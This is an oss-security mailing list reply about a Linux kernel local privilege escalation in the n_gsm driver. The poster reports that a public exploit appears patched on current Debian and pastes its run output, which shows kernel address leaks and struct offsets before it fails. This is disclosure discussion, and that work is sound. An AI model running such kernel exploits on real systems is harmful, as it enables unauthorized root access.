[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] New Linux LPE via GSMIOC_SETCONF_DLCI?
From:       "Dr. Christopher Kunz" <info () christopher-kunz ! de>
Date:       2024-04-17 8:47:46
Message-ID: c652582f-f18d-4c70-953d-366c5a721771 () christopher-kunz ! de
[Download RAW message or body]


Am 16.04.24 um 22:16 schrieb Solar Designer:
> I'm puzzled by the lack of follow-ups on this, but anyway @FFFVR_
> tweeted they also found (more) vulnerabilities in the n_gsm driver:
>
FWIW, YuriiCrimson's bug for 5.15 - 6.1 seems to be patched on current 
Debian:

debianexploitgsm:/tmp/ExploitGSM/ExploitGSM_5_15_to_6_1$ ./ExploitGSM debian
kallsyms restricted, begin retvial kallsyms table
detected kernel path-> /boot/vmlinuz-6.1.0-20-amd64
detected compressed format -> xz
Uncompressed kernel size -> 65900116
successfully taken kernel!
begin try leak startup_xen!
startup_xen leaked address  -> ffffffff8546f1c0
text leaked address         -> ffffffff83400000
lockdep_map_size     -> 32
spinlock_t_size      -> 4
mutex_size           -> 32
gsm_mux_event_offset -> 56
Error set line discipline N_GSM, Operation not permitted

--cku


[prev in list] [next in list] [prev in thread] [next in thread]